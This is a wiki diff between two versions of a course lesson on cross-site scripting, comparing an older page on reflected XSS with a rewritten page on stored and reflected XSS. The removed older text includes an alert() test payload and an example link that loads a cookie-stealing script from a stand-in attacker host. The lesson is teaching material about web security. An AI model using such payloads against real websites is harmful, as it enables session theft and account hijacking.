Unterschiede

Hier werden die Unterschiede zwischen zwei Versionen angezeigt.

--- modul:m183:learningunits:lu10:lu10b [2025/12/27 19:30] – angelegt dgaravaldi
+++ modul:m183:learningunits:lu10:lu10b [2026/01/28 16:35] (aktuell) – dgaravaldi
@@ Zeile 1: / Zeile 1: @@
-====== LU10b - Reflected cross site scripting (XSS) attacks ======
+====== LU10b - Cross-Site Scripting (XSS) Attacks ======
-\\
+<sup>Internal reference: lu/10-2.md</sup>\\
-==== What is a reflected XSS attack ====
-Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim’s browser.
+**Cross-site scripting (XSS)** is a very common type of web application attack vector in which malicious code is injected into a vulnerable web application. Unlike other attacks that target the application’s server or database directly, XSS targets the **users of the web application** — because the injected code runs in their browsers in the context of the legitimate website.
-The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts. The vulnerability is typically a result of incoming requests not being sufficiently sanitized, which allows for the manipulation of a web application’s functions and the activation of malicious scripts.
+A successful XSS attack can cause serious damage — including compromised user accounts, activation of Trojan code, manipulation of page content to trick users into sharing sensitive data, or exposure of session cookies that allow attackers to impersonate valid users.
-To distribute the malicious link, a perpetrator typically embeds it into an email or third party website (e.g., in a comment section or in social media). The link is embedded inside an anchor text that provokes the user to click on it, which initiates the XSS request to an exploited website, reflecting the attack back to the user.
+\\
+==== Types of XSS Attacks ====
+There are **two major types** of cross-site scripting attacks commonly discussed:
+    * **Stored XSS (Persistent)** – A malicious script is permanently injected into an application and served to all users.
+    * **Reflected XSS (Non-Persistent)** – A malicious script is embedded in a URL or request, then reflected off the web server back to the user’s browser when the link is visited.
 \\
-==== Reflected XSS attack example ====
+==== What is Stored Cross-Site Scripting ====
-Unlike a stored attack, where the perpetrator must locate a website that allows for permanent injection of malicious scripts, reflected attacks only require that the malicious script be embedded into a link. That being said, in order for the attack to be successful, the user needs to click on the infected link.
-As such, there are a number of key differences between reflected and stored XSS attacks, including:
+To execute a **stored XSS attack**, the attacker must find a vulnerability in a web application where user input is stored without proper validation or escaping. A common example is when a comment field or form accepts HTML input and embeds it directly into pages viewed by other users.
-    * Reflected attacks are more common.
+**Example**: An attacker enters a comment containing JavaScript that steals session cookies. Every visitor who views the comment will run the malicious script unknowingly.
-    * Reflected attacks do not have the same reach as stored XSS attacks.
-    * Reflected attacks can be avoided by vigilant users.
-    * With a reflected XSS, the perpetrator plays a “numbers game” by sending the malicious link to as many users as possible, thereby improving his odds of successfully executing the attack.
 \\
-==== Reflected XSS attack example ====
+==== Stored XSS Attack — Step by Step ====
-While visiting a forum site that requires users to log in to their account, a perpetrator executes this search query <code><script type='text/javascript'>alert('xss');</script></code> causing the following things to occur:
+{{:modul:m183:learningunits:lu10:stored-xss.png?600}}
-The query produces an alert box saying:
+    - The attacker discovers a page with an input field that allows HTML.
+    - They insert malicious JavaScript code into that field.
+    - The application stores and later serves that code as part of normal content.
+    - When other users visit the page, their browser executes the attack script.
-<code>
+\\
-<script type='text/javascript'>alert('XSS');</script > not found.
+==== How Stored XSS Endangers Users ====
-</code>
+Stored XSS is especially dangerous because:
+    * It can impact **all users** who view the infected page.
+    * Attacker-controlled scripts can steal session credentials or redirect users to phishing sites.
+    * Malicious payloads can embed external JavaScript that reports user data back to the attacker.
+\\
+==== Related Topics ====
+[1]: https://owasp.org/www-community/attacks/xss/ Cross Site Scripting (XSS) | OWASP
-The page's URL reads <code>http://ecommerce.com?q=<script type='text/javascript'>alert('XSS'); </script></code>.
+[2]: https://developer.mozilla.org/docs/Web/Security/Attacks/XSS?utm_source=chatgpt.com Cross-site scripting (XSS) - Security | MDN
-This tells the perpetrator that the website is vulnerable. Next, he creates his own URL,
-which reads <code>http://forum.com?q=news<\script%20src="http://hackersite.com/authstealer.js"</code> and embeds it as a
-link into a seemingly harmless email, which he sends to a group of forum users.
-While the sending address and subject line may appear suspect to some, it does not mean that it won’t be clicked on.
+----
-In fact, even if only one in every 1,000 recipients of the email click on the link, that still amounts to several dozen infected forum users. They will be taken to the forum’s website, where the malicious script will be reflected back to their browser, enabling the perpetrator to steal their session cookies and hijack their forum accounts.
+[[https://creativecommons.org/licenses/by-nc-sa/4.0/|{{https://i.creativecommons.org/l/by-nc-sa/4.0/88x31.png}}]] Daniel Garavaldi